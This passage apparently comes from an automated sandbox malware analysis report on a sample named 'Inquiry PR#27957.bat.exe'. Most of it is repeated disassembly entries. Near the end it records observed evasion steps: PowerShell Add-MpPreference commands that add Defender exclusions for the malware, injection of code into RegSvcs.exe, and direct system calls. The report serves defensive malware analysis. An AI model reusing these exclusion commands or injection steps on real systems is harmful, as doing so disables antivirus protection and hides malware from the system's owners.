            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016264AB mov eax, dword ptr fs:[00000030h]9_2_016264AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016544B0 mov ecx, dword ptr fs:[00000030h]9_2_016544B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016AA4B0 mov eax, dword ptr fs:[00000030h]9_2_016AA4B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016DA49A mov eax, dword ptr fs:[00000030h]9_2_016DA49A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01628770 mov eax, dword ptr fs:[00000030h]9_2_01628770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630770 mov eax, dword ptr fs:[00000030h]9_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165674D mov esi, dword ptr fs:[00000030h]9_2_0165674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165674D mov eax, dword ptr fs:[00000030h]9_2_0165674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165674D mov eax, dword ptr fs:[00000030h]9_2_0165674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01620750 mov eax, dword ptr fs:[00000030h]9_2_01620750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662750 mov eax, dword ptr fs:[00000030h]9_2_01662750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662750 mov eax, dword ptr fs:[00000030h]9_2_01662750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016AE75D mov eax, dword ptr fs:[00000030h]9_2_016AE75D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A4755 mov eax, dword ptr fs:[00000030h]9_2_016A4755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165C720 mov eax, dword ptr fs:[00000030h]9_2_0165C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165C720 mov eax, dword ptr fs:[00000030h]9_2_0165C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165273C mov eax, dword ptr fs:[00000030h]9_2_0165273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165273C mov ecx, dword ptr fs:[00000030h]9_2_0165273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165273C mov eax, dword ptr fs:[00000030h]9_2_0165273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169C730 mov eax, dword ptr fs:[00000030h]9_2_0169C730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165C700 mov eax, dword ptr fs:[00000030h]9_2_0165C700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01620710 mov eax, dword ptr fs:[00000030h]9_2_01620710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01650710 mov eax, dword ptr fs:[00000030h]9_2_01650710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016427ED mov eax, dword ptr fs:[00000030h]9_2_016427ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016427ED mov eax, dword ptr fs:[00000030h]9_2_016427ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016427ED mov eax, dword ptr fs:[00000030h]9_2_016427ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016AE7E1 mov eax, dword ptr fs:[00000030h]9_2_016AE7E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016247FB mov eax, dword ptr fs:[00000030h]9_2_016247FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016247FB mov eax, dword ptr fs:[00000030h]9_2_016247FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162C7C0 mov eax, dword ptr fs:[00000030h]9_2_0162C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A07C3 mov eax, dword ptr fs:[00000030h]9_2_016A07C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016207AF mov eax, dword ptr fs:[00000030h]9_2_016207AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D47A0 mov eax, dword ptr fs:[00000030h]9_2_016D47A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C678E mov eax, dword ptr fs:[00000030h]9_2_016C678E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E866E mov eax, dword ptr fs:[00000030h]9_2_016E866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E866E mov eax, dword ptr fs:[00000030h]9_2_016E866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165A660 mov eax, dword ptr fs:[00000030h]9_2_0165A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165A660 mov eax, dword ptr fs:[00000030h]9_2_0165A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01652674 mov eax, dword ptr fs:[00000030h]9_2_01652674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163C640 mov eax, dword ptr fs:[00000030h]9_2_0163C640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163E627 mov eax, dword ptr fs:[00000030h]9_2_0163E627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01656620 mov eax, dword ptr fs:[00000030h]9_2_01656620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01658620 mov eax, dword ptr fs:[00000030h]9_2_01658620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162262C mov eax, dword ptr fs:[00000030h]9_2_0162262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169E609 mov eax, dword ptr fs:[00000030h]9_2_0169E609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163260B mov eax, dword ptr fs:[00000030h]9_2_0163260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163260B mov eax, dword ptr fs:[00000030h]9_2_0163260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163260B mov eax, dword ptr fs:[00000030h]9_2_0163260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163260B mov eax, dword ptr fs:[00000030h]9_2_0163260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163260B mov eax, dword ptr fs:[00000030h]9_2_0163260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163260B mov eax, dword ptr fs:[00000030h]9_2_0163260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163260B mov eax, dword ptr fs:[00000030h]9_2_0163260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662619 mov eax, dword ptr fs:[00000030h]9_2_01662619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169E6F2 mov eax, dword ptr fs:[00000030h]9_2_0169E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169E6F2 mov eax, dword ptr fs:[00000030h]9_2_0169E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169E6F2 mov eax, dword ptr fs:[00000030h]9_2_0169E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169E6F2 mov eax, dword ptr fs:[00000030h]9_2_0169E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A06F1 mov eax, dword ptr fs:[00000030h]9_2_016A06F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A06F1 mov eax, dword ptr fs:[00000030h]9_2_016A06F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165A6C7 mov ebx, dword ptr fs:[00000030h]9_2_0165A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165A6C7 mov eax, dword ptr fs:[00000030h]9_2_0165A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165C6A6 mov eax, dword ptr fs:[00000030h]9_2_0165C6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016566B0 mov eax, dword ptr fs:[00000030h]9_2_016566B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01624690 mov eax, dword ptr fs:[00000030h]9_2_01624690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01624690 mov eax, dword ptr fs:[00000030h]9_2_01624690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01646962 mov eax, dword ptr fs:[00000030h]9_2_01646962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01646962 mov eax, dword ptr fs:[00000030h]9_2_01646962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01646962 mov eax, dword ptr fs:[00000030h]9_2_01646962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0166096E mov eax, dword ptr fs:[00000030h]9_2_0166096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0166096E mov edx, dword ptr fs:[00000030h]9_2_0166096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0166096E mov eax, dword ptr fs:[00000030h]9_2_0166096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C4978 mov eax, dword ptr fs:[00000030h]9_2_016C4978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C4978 mov eax, dword ptr fs:[00000030h]9_2_016C4978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016AC97C mov eax, dword ptr fs:[00000030h]9_2_016AC97C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A0946 mov eax, dword ptr fs:[00000030h]9_2_016A0946
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F4940 mov eax, dword ptr fs:[00000030h]9_2_016F4940
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A892A mov eax, dword ptr fs:[00000030h]9_2_016A892A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B892B mov eax, dword ptr fs:[00000030h]9_2_016B892B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169E908 mov eax, dword ptr fs:[00000030h]9_2_0169E908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169E908 mov eax, dword ptr fs:[00000030h]9_2_0169E908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016AC912 mov eax, dword ptr fs:[00000030h]9_2_016AC912
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01618918 mov eax, dword ptr fs:[00000030h]9_2_01618918
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01618918 mov eax, dword ptr fs:[00000030h]9_2_01618918
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016AE9E0 mov eax, dword ptr fs:[00000030h]9_2_016AE9E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016529F9 mov eax, dword ptr fs:[00000030h]9_2_016529F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016529F9 mov eax, dword ptr fs:[00000030h]9_2_016529F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B69C0 mov eax, dword ptr fs:[00000030h]9_2_016B69C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A9D0 mov eax, dword ptr fs:[00000030h]9_2_0162A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A9D0 mov eax, dword ptr fs:[00000030h]9_2_0162A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A9D0 mov eax, dword ptr fs:[00000030h]9_2_0162A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A9D0 mov eax, dword ptr fs:[00000030h]9_2_0162A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A9D0 mov eax, dword ptr fs:[00000030h]9_2_0162A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162A9D0 mov eax, dword ptr fs:[00000030h]9_2_0162A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016549D0 mov eax, dword ptr fs:[00000030h]9_2_016549D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016EA9D3 mov eax, dword ptr fs:[00000030h]9_2_016EA9D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A0 mov eax, dword ptr fs:[00000030h]9_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016209AD mov eax, dword ptr fs:[00000030h]9_2_016209AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016209AD mov eax, dword ptr fs:[00000030h]9_2_016209AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A89B3 mov esi, dword ptr fs:[00000030h]9_2_016A89B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A89B3 mov eax, dword ptr fs:[00000030h]9_2_016A89B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A89B3 mov eax, dword ptr fs:[00000030h]9_2_016A89B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016AE872 mov eax, dword ptr fs:[00000030h]9_2_016AE872
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016AE872 mov eax, dword ptr fs:[00000030h]9_2_016AE872
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe"
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fuqwoDzun.exe"
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtProtectVirtualMemory: Direct from: 0x77542F9C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtSetInformationProcess: Direct from: 0x77542C5C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtOpenKeyEx: Direct from: 0x77542B9C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtTerminateThread: Direct from: 0x77537B2E
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtCreateFile: Direct from: 0x77542FEC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtOpenFile: Direct from: 0x77542DCC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtQueryInformationToken: Direct from: 0x77542CAC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtTerminateThread: Direct from: 0x77542FCC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtDeviceIoControlFile: Direct from: 0x77542AEC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtAllocateVirtualMemory: Direct from: 0x77542BEC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtQueryVolumeInformationFile: Direct from: 0x77542F2C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtOpenSection: Direct from: 0x77542E0C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtAllocateVirtualMemory: Direct from: 0x775448EC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtSetInformationThread: Direct from: 0x775363F9
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtQuerySystemInformation: Direct from: 0x775448CC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtClose: Direct from: 0x77542B6C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtReadVirtualMemory: Direct from: 0x77542E8C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtCreateKey: Direct from: 0x77542C6C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtSetInformationThread: Direct from: 0x77542B4C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtQueryAttributesFile: Direct from: 0x77542E6C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtAllocateVirtualMemory: Direct from: 0x77543C9C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtCreateUserProcess: Direct from: 0x7754371C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtQueryInformationProcess: Direct from: 0x77542C26
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtResumeThread: Direct from: 0x77542FBC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtWriteVirtualMemory: Direct from: 0x7754490C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtDelayExecution: Direct from: 0x77542DDC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtAllocateVirtualMemory: Direct from: 0x77542BFC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtReadFile: Direct from: 0x77542ADC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtQuerySystemInformation: Direct from: 0x77542DFC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtResumeThread: Direct from: 0x775436AC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtNotifyChangeKey: Direct from: 0x77543C2C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtCreateMutant: Direct from: 0x775435CC
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtWriteVirtualMemory: Direct from: 0x77542E3C
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe NtMapViewOfSection: Direct from: 0x77542D1C
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\sfc.exe protection: execute and read and write
